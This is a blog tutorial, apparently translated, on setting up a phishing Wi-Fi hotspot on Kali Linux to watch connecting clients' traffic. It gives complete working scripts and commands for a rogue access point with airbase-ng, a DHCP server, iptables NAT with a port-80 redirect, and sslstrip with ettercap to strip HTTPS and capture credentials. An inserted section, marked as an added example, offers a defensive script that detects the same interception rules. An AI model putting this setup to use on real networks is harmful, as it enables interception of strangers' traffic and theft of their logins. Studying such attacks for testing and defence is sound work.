Main content: Drawing on a number of articles on the web and on my own successful hands-on experiments, this article records in detail how I built a phishing hotspot under Kali Linux.
It focuses on hands-on implementation and does not cover the underlying principles, which should be explored in detail in a separate follow-up article.
Lab Environment:
Host machine: Windows 8 64-bit
Virtual machine software:
VirtualBox 4.3.8 (requires installing the matching 4.3.8 Extension Pack and the Guest Additions, which are two different
packages! Installing the Guest Additions requires the appropriate kernel header files and a build environment, which are not covered here)
Virtual machine: Kali Linux 1.08, i386 (for installing the system, please search for a corresponding tutorial)
USB wireless card with the Ralink RT2870 chip (Kali ships with the driver; if you need to install a network card driver, please search and solve it yourself)
Note: this experiment cannot be completed in a virtual machine if all you have is a laptop's built-in wireless card, because the laptop's
own wireless card cannot be assigned to a virtual machine as a USB device. It must be a USB wireless card.
Start the Kali Linux virtual machine and assign the wireless card to it from the menu in the upper left-hand corner: Devices -> assign a USB device
Building the phishing AP environment:
General approach and configuration:
Kali has an Ethernet card eth0 (select Network Address Translation (NAT) in the virtual machine's network configuration so that
the Kali virtual machine reaches the Internet via the Windows 8 physical host). This is the interface through which Kali connects to the Internet, and
clients connected to our phishing AP will also reach the Internet through it. Our actual goal is to monitor the clients' data traffic.
Our AP uses DHCP to automatically assign IP addresses to connecting clients. The following is a simple configuration of the DHCP server:
Installation and configuration of DHCP
Note: the DHCP package name and the configuration file directory differ from those on CentOS
①. Install the DHCP3 server software: $ sudo apt-get install dhcp3-server
②. Configure the DHCP3 service configuration file /etc/dhcp3/dhcpd.conf
# vi /etc/dhcp3/dhcpd.conf
authoritative;
ddns-update-style none;
ignore client-updates;
default-lease-time 7200;
max-lease-time 36000;
option domain-name "xx.cn";    # pick a domain name; anything will do
option domain-name-servers 202.202.96.33, 202.202.96.34;    # these two are DNS servers; use the ones provided by your ISP
option routers 192.168.10.1;    # default gateway
subnet 192.168.10.0 netmask 255.255.255.0 {    # network segment and mask
    range 192.168.10.10 192.168.10.120;    # range of IP addresses to assign
}
③. To change the network interface that the DHCP3 service listens on, edit
/etc/default/dhcp3-server
INTERFACES="at0"    # network interface the DHCP server listens on; at0 is discussed later in the article
Note: you need to assign an IP address to the network interface the DHCP service listens on, and that address must be on the same network segment as the subnet provided by DHCP;
only then can the DHCP service start properly. With the configuration done, we do not start it yet.
We want to reach the Internet via the eth0 network card, so the data coming in from our phishing AP needs to go out via NAT.
For more details on the Linux firewall iptables and NAT, please refer to the material written by Brother Bird (VBird):
http://linux.vbird.org/linux_server/0250simple_firewall.php
iptables.sh is the simple iptables and NAT setup I wrote, for reference if you need it.
iptables.sh content:
#!/bin/bash
## 2014-08-19
## fake AP iptables configure script
## written by Netcake
# filter
# Clear all firewall rules in the filter table
iptables -F
iptables -X
iptables -Z
# Set the default action for the 3 chains of the filter table
iptables -P INPUT DROP
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT
# Trust the local loopback interface lo
iptables -A INPUT -i lo -j ACCEPT
# Trust connections established by this host
iptables -A INPUT -m state --state RELATED,ESTABLISHED -j ACCEPT
# Enable the Linux kernel's packet forwarding. This method is lost after a reboot; to make packet forwarding permanent,
# edit the /etc/sysctl.conf file and find the line
#
# net.ipv4.ip_forward=1
#
# then uncomment it
echo "1" > /proc/sys/net/ipv4/ip_forward
# nat
# Clear all firewall rules in the nat table
iptables -t nat -F
iptables -t nat -X
iptables -t nat -Z
# Set the default action for the 3 chains of the nat table; the table name nat must be specified, otherwise the default is filter
iptables -t nat -P PREROUTING ACCEPT
iptables -t nat -P OUTPUT ACCEPT
iptables -t nat -P POSTROUTING ACCEPT
# Internet access, turn on NAT
# This rule takes all data from the 192.168.10.0/24 network segment (the IP addresses DHCP assigns to clients attached to the phishing AP) that goes out through the eth0 interface
# and performs network address translation on it, replacing the IP address of data from the 192.168.10.0/24 segment with the IP address of the eth0 interface
iptables -t nat -A POSTROUTING -s 192.168.10.0/24 -o eth0 -j MASQUERADE
# listen on local, redirect http data, sslstrip listening port
# Redirect all TCP data with destination port 80 to local port 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
# iptables.sh script end
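A defender's view of the same rule set, as an added example that is not part of the original article: the audit_rules function below (a hypothetical name) scans iptables-save output for the combination that iptables.sh installs, namely a MASQUERADE rule plus a port-80 REDIRECT in the nat table with packet forwarding enabled. The sample dump is constructed.

```shell
#!/bin/bash
# Added example (not from the article): audit an iptables-save dump for the
# transparent-HTTP-interception pattern that iptables.sh installs.

# Usage: audit_rules IP_FORWARD_VALUE < dump
# Prints one finding per line. Returns 0 only when forwarding, MASQUERADE
# and a port-80 REDIRECT in the nat table are all present.
audit_rules() {
    local ip_forward="$1" table="" line masq=0 redir=0
    while IFS= read -r line; do
        case "$line" in
            \**) table="${line#\*}"; continue ;;   # table header, e.g. *nat
        esac
        [ "$table" = "nat" ] || continue           # only the nat table matters here
        case "$line" in
            "-A POSTROUTING "*"-j MASQUERADE"*)
                masq=1; echo "masquerade: $line" ;;
            "-A PREROUTING "*"--dport 80 "*"-j REDIRECT"*)
                redir=1; echo "http-redirect: $line" ;;
        esac
    done
    if [ "$ip_forward" = "1" ]; then echo "forwarding: ip_forward=1"; fi
    [ "$ip_forward" = "1" ] && [ "$masq" = 1 ] && [ "$redir" = 1 ]
}

# Constructed sample: what iptables-save prints after iptables.sh has run.
sample_gateway_dump() {
    cat <<'EOF'
*nat
:PREROUTING ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 10000
-A POSTROUTING -s 192.168.10.0/24 -o eth0 -j MASQUERADE
COMMIT
*filter
:INPUT DROP [0:0]
-A INPUT -i lo -j ACCEPT
COMMIT
EOF
}

# Live use (root): iptables-save | audit_rules "$(cat /proc/sys/net/ipv4/ip_forward)"
if sample_gateway_dump | audit_rules 1; then
    echo "RESULT: host is configured as an HTTP-intercepting NAT gateway"
fi
```

The http-redirect finding shows the local port (10000 here) on which to look for a listening proxy process.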
ap.sh is the script that turns on the phishing hotspot
ap.sh content:
#!/bin/bash
# During the experiment, I found that the AP usually started successfully the first time, but afterwards it sometimes succeeded and sometimes failed. I later observed that when it failed,
# network-manager inside the virtual machine was not recognizing the wireless card, so first restart network-manager to recognize the wireless card
# and then start the AP; after that the start failures no longer occurred.
# Restart network-manager to recognize the wireless card
/etc/init.d/network-manager restart
sleep 4
# Put the wireless card into monitor mode
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
# Start monitor mode on the wireless card. A corresponding monitoring virtual interface mon0 is created.
# At this point mon0 is effectively equivalent to wlan0
airmon-ng start wlan0
sleep 3
# Set the SSID to wifi and the AP channel to 6, then start the AP. The airbase-ng command creates an atX virtual network interface,
# which here is at0
airbase-ng -e wifi -c 6 mon0
# ap.sh end
The at0.sh script sets the network parameters of the virtual network interface at0 and starts the DHCP service to listen for client requests on at0
at0.sh content:
#!/bin/bash
# Bring up the at0 virtual network interface
# Set its IP to the gateway IP specified in the DHCP server configuration file (that is, option routers in the DHCP configuration file)
# Note: the IP address of the network interface the DHCP service listens on must be on the same network segment as the subnet provided by DHCP
# Set the MTU; it doesn't hurt to set it.
ifconfig at0 up
ifconfig at0 192.168.10.1 netmask 255.255.255.0
ifconfig at0 mtu 1500
# Specify the configuration file /etc/dhcp3/dhcpd.conf and the PID file /var/run/dhcpd.pid used by the DHCP server,
# plus the network interface to listen on, at0
dhcpd -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcpd.pid at0
# Start the DHCP service. Note that whenever you modify the DHCP server's configuration file, you must restart the DHCP service for it to take effect
/etc/init.d/isc-dhcp-server start
# at0.sh end
Start sslstrip and ettercap monitoring
We have already redirected all TCP port 80 data to port 10000, so we just need to listen there.
# sslstrip -l 10000
Open another terminal and use ettercap to display the SSL-encrypted data it captures
# ettercap -Tqi at0
Note: starting ettercap sets the value of /proc/sys/net/ipv4/ip_forward to 0, which cuts the clients off from the
Internet, so you need to manually modify the value of /proc/sys/net/ipv4/ip_forward
# echo 1 > /proc/sys/net/ipv4/ip_forward
This article is from the "Small Fish" blog; reprinting is declined!
Setting up a phishing hotspot on Kali Linux